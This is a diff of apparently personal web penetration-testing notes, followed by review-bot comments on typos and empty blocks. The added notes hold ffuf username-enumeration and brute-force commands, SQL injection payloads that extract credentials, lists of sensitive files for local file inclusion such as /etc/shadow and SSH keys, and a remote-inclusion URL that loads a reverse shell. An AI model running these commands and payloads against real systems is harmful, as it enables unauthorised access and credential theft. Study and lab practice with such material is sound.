diff --git a/enumeration/docs/ffuf.md b/enumeration/docs/ffuf.md index 42513a5..11e5e72 100644 --- a/enumeration/docs/ffuf.md +++ b/enumeration/docs/ffuf.md @@ -26,7 +26,15 @@ seq 0 255 | fuff -u 'http:///sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33 ```sh ffuf -u http:///sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded' ``` - +### Fuzz Users and use Bruteforce +* Fuzz users and write file +```sh +ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http:///customers/signup -mr "username already exists" -o fuff.out +``` +* Use users saved in `fuff.out` to bruteforce +```sh +ffuf -w userlist.txt:W1,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http:///customers/login -fc 200 +``` ### Fuzz Subdomains ```sh ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md index 65c9658..dc6e326 100644 --- a/exploit/sqli/sqli.md +++ b/exploit/sqli/sqli.md 
@@ -31,6 +31,16 @@ SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+ SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ ``` +* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char. +```sql +' UNION SELECT null,null,null where database() like 'da%';-- - +``` + +### Time based +* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes +```sql +' union select sleep(3), null; -- - +``` ### Blind injection // Guessing characters ```sh @@ -70,6 +80,14 @@ http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+ ' UNION SELECT NULL,username,password,NULL FROM users -- // ``` +* Retrieve content by union poking the count and order, afterwards extracting tables via +```sh +0 union select null, null, database() +0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db' +0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename' +0 union select null, null, group_concat(username, ':', password from found_tablename +``` + * [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection) ### Identify Database diff --git a/exploit/web/command_injection.md b/exploit/web/command_injection.md new file mode 100644 index 0000000..80fd02c --- /dev/null +++ b/exploit/web/command_injection.md @@ -0,0 +1,19 @@ +# Command Injection + +* Blind injection +* Verbose injection + +## Blind Injection +* Check via ping, open a `tcpdump` on ICMP to listen for packets +* Redirect to logfile and read +* Use `sleep` or `timeout` to check if ci is possible in general + +## Functions +* Watch out for + * `eval()` + * `exec()` + * `passthru()` + * `system()` + + + 
diff --git a/exploit/web/cookie_tampering.md b/exploit/web/cookie_tampering.md new file mode 100644 index 0000000..eab9f63 --- /dev/null +++ b/exploit/web/cookie_tampering.md @@ -0,0 +1 @@ +# Cookie Tampering diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md index 0d04667..3ca217c 100644 --- a/exploit/web/local_file_inclusion.md +++ b/exploit/web/local_file_inclusion.md @@ -36,3 +36,21 @@ curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=.php ``` +## Files of Interest +* `/etc/issue` +* `/etc/profile` +* `/proc/version` +* `/etc/passwd` +* `/etc/shadow` +* `/root/.bash_history` +* `/var/log/dmessage` +* `/var/mail/root` +* `/root/.ssh/id_rsa` +* `/var/log/apache2/access.log` +* `C:\boot.ini` + +## Tricks + +* Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4 +* Terminate query with `/.` +* `..//..//..//file`, double slashes diff --git a/exploit/web/php/password_reset.md b/exploit/web/php/password_reset.md new file mode 100644 index 0000000..8cf9bc9 --- /dev/null +++ b/exploit/web/php/password_reset.md @@ -0,0 +1,4 @@ +# Password Reset + +* Using a password reset while inserting an email address via GET and POST method. +* `$_REQUEST` as an array favors POST over GET. So, sending the attacker email address via POST with the GET query parameter. diff --git a/exploit/web/remote_file_inclusion.md b/exploit/web/remote_file_inclusion.md new file mode 100644 index 0000000..6061860 --- /dev/null +++ b/exploit/web/remote_file_inclusion.md @@ -0,0 +1,9 @@ +# Remote File Inclusion + + +## Usage +* Use a GET query parameter to include an attacker URL. +```sh +https://test.com/files.php?file=http://:/reverse_shell.txt +``` +* Payload may be PHP for example, but should not end in executable file extensions. The payload is executed locally, otherwise. 
diff --git a/exploit/web/xss.md b/exploit/web/xss.md index 2713e77..c84a8ad 100644 --- a/exploit/web/xss.md +++ b/exploit/web/xss.md @@ -2,7 +2,12 @@ A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS. ## Stored XSS -This is where a malicious string originates from the websites database. +This is where a malicious string originates from the websites database. Such as (stored in a db) +* User profiles +* Chats and comments +* Part of link + +* Blind xss is stored inside the app but effects are only visible by proxy, [xsshunter](https://xsshunter.com/). ### Examples * Sanity test by changing DOM content @@ -12,13 +17,13 @@ This is where a malicious string originates from the websites database. * Cookie stealing -``` +```javascript ``` * Navigte to `/logs` and take sid * Open nc port and collect cookies -```sh +```javascript @@ -26,6 +31,8 @@ This is where a malicious string originates from the websites database. ## Reflected XSS In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload. +* URL parameters inside GET queries +* File paths ### Usage As script inside parameter @@ -36,6 +43,11 @@ http://example.com/search?keyword= ``` http://example.com/reflected?keyword= ``` +* Session stealing, base64 encoded +```javascript + +``` + * open netcat binder to catch the http queries ## DOM based XSS With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so: @@ -60,7 +72,7 @@ test" onmouseover="alert(document.cookie)" ``` or ```javascript -<script>alert("1")</script> +<script>alert("1");</script> ``` * `alert()` sanitizing ```javascript 
@@ -101,6 +113,16 @@ or  } ``` +* base64 encoded keylogger +```javascript + +``` +## Tricks and Tips +* Use Polyglots ## Protection Methods
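
Review bot: in the enumeration/docs/ffuf.md hunk, the two commands under "Fuzz Users and use Bruteforce" do not chain as written: the first writes `-o fuff.out` while the second reads `userlist.txt:W1`, and ffuf's `-o` output is JSON by default, so either the conversion step between them or the `-of` format choice needs documenting. The output file name should also follow the tool's spelling (`ffuf`, not `fuff`), a typo the surrounding context line `seq 0 255 | fuff -u` already carries. The `-mr "username already exists"` and `-fc 200` choices are specific to how that one target responds, which the bullets should say so the commands are not copied blindly.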
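
Review bot: in the first exploit/sqli/sqli.md hunk, the "Time based" bullet says "the sleep(5) function executes" but the snippet uses `sleep(3)`; pick one value. "Blind boolean base substring fuzzing" should read "boolean-based", and "Count number of cols in this way" sits under the time-based heading although it refers to the `null` padding used to establish the column count; move it next to the column-counting material or say explicitly how the two relate.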
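
Review bot: in the second exploit/sqli/sqli.md hunk, the last line of the new block is missing the closing parenthesis of `group_concat(username, ':', password` before `from found_tablename`, and the block is SQL but fenced as ```sh; tag it ```sql like the blocks above it. "Retrieve content by union poking the count and order" is unclear; state that the column count and order are established first (the `null` placeholders) and only then are the `information_schema` queries run.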
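
Review bot: in the new exploit/web/command_injection.md, "ci" in "check if ci is possible in general" is undefined; spell it out as command injection. The top-level list names "Verbose injection" but no section covers it, and the "Functions" list (`eval()`, `exec()`, `passthru()`, `system()`) is PHP-specific without saying so, which matters for anyone using it as a sink list when reviewing code in another language; also drop the trailing blank lines at end of file.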
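
Review bot: exploit/web/cookie_tampering.md is a heading-only stub; either give it a body or leave the file out of this change so nothing links to an empty page.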
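
Review bot: in the exploit/web/local_file_inclusion.md hunk, `/var/log/dmessage` in "Files of Interest" looks like a typo; the kernel boot log conventionally lives at `/var/log/dmesg`. The list mixes Linux and Windows entries (`C:\boot.ini`) with no label, and under "Tricks" the sentence "Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4" should be reworded along the lines of "null-byte termination (`%00`) only works on PHP older than 5.3.4, the version that started rejecting null bytes in file paths", so the reader knows it is a version check, not a general trick.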
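
Review bot: in the new exploit/web/php/password_reset.md, "So, sending the attacker email address via POST with the GET query parameter." is a sentence fragment, and the claim that `$_REQUEST` "as an array favors POST over GET" is a configuration default rather than a property of the array: precedence follows PHP's `request_order` setting (falling back to `variables_order`), so the note should state that assumption. It is worth adding that the underlying weakness is the application reading `$_REQUEST` at all; reading `$_GET` or `$_POST` explicitly removes the ambiguity.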
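
Review bot: in the new exploit/web/remote_file_inclusion.md, the last bullet ("should not end in executable file extensions. The payload is executed locally, otherwise.") is hard to parse; state the reason directly: if the hosted file carries a `.php` extension, the server hosting it runs it instead of serving its source, which is why the example uses a `.txt` name. The URL in the ```sh block is not a shell command and has an empty host and port (`http://:/`); either fence it as plain text with a marked placeholder such as `<host>:<port>`, or show the `curl` form used in local_file_inclusion.md.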
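
Review bot: in the first exploit/web/xss.md hunk (@@ -2,7), "Such as (stored in a db)" is a fragment and "Part of link" is too vague to act on; reword the lead-in as "Typical storage points include:" and say what "Part of link" means (for instance a user-supplied URL that is rendered back into a page). "effects are only visible by proxy" misdescribes blind XSS: the payload fires in a context the tester cannot observe directly (an admin view, a support tool), which is why an out-of-band callback service such as xsshunter is needed to learn that it ran. "websites database" in the context line needs an apostrophe.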
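
Review bot: in the exploit/web/xss.md hunk at @@ -12,13, changing the fence language from ```sh to ```javascript is right, but both blocks are empty as shown, so either the snippet content was lost in the commit or the "Cookie stealing" headings should go; an empty fenced block renders as a blank box. The context line "Navigte to `/logs`" has a typo (Navigate) that could be fixed while these lines are being touched.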
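
Review bot: in the exploit/web/xss.md hunk at @@ -26,6, the two added bullets ("URL parameters inside GET queries", "File paths") follow the paragraph with no lead-in sentence, so it is unclear what they enumerate; add a line such as "Common reflection points:" before them. The context line "victims request" should read "victim's request".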
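
Review bot: in the exploit/web/xss.md hunk at @@ -36,6, the "Session stealing, base64 encoded" block is empty in this hunk, the same problem as the cookie-stealing blocks earlier in the file; remove the heading or restore the content. The following context bullet "open netcat binder" should read "listener".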
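
Review bot: in the last exploit/web/xss.md hunk (@@ -101,6), the "base64 encoded keylogger" block is empty, and the new "## Tricks and Tips" section holds a single bullet, "Use Polyglots", placed directly against "## Protection Methods" with no blank line and no definition of the term; either define what a polyglot payload is and why it is used when testing filters, or fold the bullet into the existing examples.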